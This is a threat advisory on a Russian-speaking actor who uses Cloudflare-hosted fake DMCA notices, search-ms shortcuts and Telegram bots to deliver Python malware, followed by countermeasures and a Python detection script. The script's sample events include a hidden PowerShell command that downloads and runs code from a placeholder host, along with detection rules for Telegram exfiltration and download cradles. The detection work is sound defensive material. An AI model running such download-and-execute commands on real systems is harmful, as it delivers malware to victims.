VTA-004510 – Cloudflare & Telegram Exploited for Stealthy Phishing and Malware Evasion
A Russian-speaking threat actor is leveraging Cloudflare’s services and Telegram to conduct highly deceptive phishing attacks. By abusing Cloudflare’s Pages.dev and Workers.dev, the attackers host fraudulent DMCA takedown notices designed to trick victims into downloading malicious files disguised as PDFs. Once executed, these files initiate an attack chain that exploits the “search-ms” protocol, delivering a Windows shortcut (.lnk) file. This file runs a PowerShell script to retrieve additional payloads, including Python-based malware, from compromised servers.
The malware establishes persistence by creating startup shortcuts and communicates with Pyramid C2 servers, ensuring continued access to infected systems. Additionally, it exfiltrates victim IP addresses to an attacker-controlled Telegram bot, enabling real-time tracking and further exploitation. Despite their technical sophistication, the attackers have made operational security mistakes, leaving open directories exposed, which has allowed researchers to uncover over 20 domains linked to their malicious infrastructure.
Severity:
Medium
Attack Surface:
Email, Endpoint, Infrastructure, Web Application, Web Browser
Tactics:
Command and Control, Defense Evasion, Execution, Exfiltration, Initial Access
Techniques:
T1566 – Spearphishing Link
T1059 – Command and Scripting Interpreter: PowerShell
T1027 – Obfuscated Files or Information
T1102 – Web Service: Bidirectional Communication
T1041 – Exfiltration Over C2 Channel
References:
1. https://gbhackers.com/hackers-exploit-cloudflare/
SuperPRO’s Threat Countermeasures Procedures:
1. Implement advanced phishing protection, including DMARC, DKIM, and SPF, to block phishing emails delivering malicious links.
2. Configure firewalls and web proxies to block access to untrusted Cloudflare Pages.dev and Workers.dev domains.
3. Detect outbound connections to Telegram’s infrastructure, which may indicate exfiltration or command-and-control activity.
4. Configure endpoint security to allow only signed PowerShell scripts and monitor for unusual script execution.
5. Enable attack surface reduction (ASR) rules to block malicious script execution and suspicious process creations.
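The detections in steps 3 and 4 can be expressed as simple rules over endpoint telemetry. The following is an added example (not part of this advisory or its source article) that runs four rules covering the chain described above, search-ms launched from a browser, a PowerShell downloader spawned from a shortcut, a Startup-folder .lnk drop, and Telegram Bot API traffic from a non-browser process, over constructed Sysmon-style events; the field names, the browser list and the use of api.telegram.org as the Bot API host are assumptions.

```python
import re

BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe"}  # assumed allow-list of browsers
DOWNLOAD_HINTS = ("downloadstring", "downloadfile", "invoke-webrequest", "iwr ", "-enc")
STARTUP_LNK = re.compile(r"\\Start Menu\\Programs\\Startup\\[^\\]+\.lnk$", re.I)
TELEGRAM_BOT_API = "api.telegram.org"  # Bot API host, assumed to be the exfil endpoint


def exe(path):
    # Lower-cased file name of an image path (Windows separators)
    return path.rsplit("\\", 1)[-1].lower()


def classify(ev):
    """Return the names of the rules one event matches (empty list if benign)."""
    hits = []
    if ev["type"] == "process":
        img, parent, cmd = exe(ev["image"]), exe(ev["parent"]), ev["cmdline"].lower()
        # Stage 1: the fake "PDF" link opens a search-ms: URI straight from the browser
        if "search-ms:" in cmd and parent in BROWSERS:
            hits.append("search-ms_from_browser")
        # Stage 2: the delivered .lnk (opened via Explorer) runs a PowerShell downloader
        if img in ("powershell.exe", "pwsh.exe") and parent == "explorer.exe" \
                and any(h in cmd for h in DOWNLOAD_HINTS):
            hits.append("lnk_powershell_downloader")
    elif ev["type"] == "file" and STARTUP_LNK.search(ev["target"]):
        # Persistence: a new shortcut dropped into the per-user Startup folder
        hits.append("startup_shortcut_persistence")
    elif ev["type"] == "network" and ev["dest_host"].lower() == TELEGRAM_BOT_API \
            and exe(ev["image"]) not in BROWSERS:
        # Exfiltration: Bot API traffic from something that is not a browser
        hits.append("telegram_api_from_non_browser")
    return hits


def scan(events):
    # Count, per rule, how many events triggered it
    counts = {}
    for ev in events:
        for rule in classify(ev):
            counts[rule] = counts.get(rule, 0) + 1
    return counts


SAMPLE_EVENTS = [  # constructed sample events: one per stage plus one benign browser connection
    {"type": "process", "image": r"C:\Windows\explorer.exe",
     "parent": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "cmdline": r'"C:\Windows\explorer.exe" search-ms:query=DMCA_Notice&crumb=location:\\example.invalid\share'},
    {"type": "process", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": "powershell.exe -w hidden -c IEX((New-Object Net.WebClient).DownloadString('http://example.invalid/stage2'))"},
    {"type": "file", "image": r"C:\Users\alice\AppData\Local\Temp\python.exe",
     "target": r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.lnk"},
    {"type": "network", "image": r"C:\Users\alice\AppData\Local\Temp\python.exe", "dest_host": "api.telegram.org"},
    {"type": "network", "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe", "dest_host": "api.telegram.org"},
]
```

Calling `scan(SAMPLE_EVENTS)` reports one hit per rule and none for the benign browser connection; in practice the rules would be fed from a SIEM query over the same event types.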
Contributed by: Carmen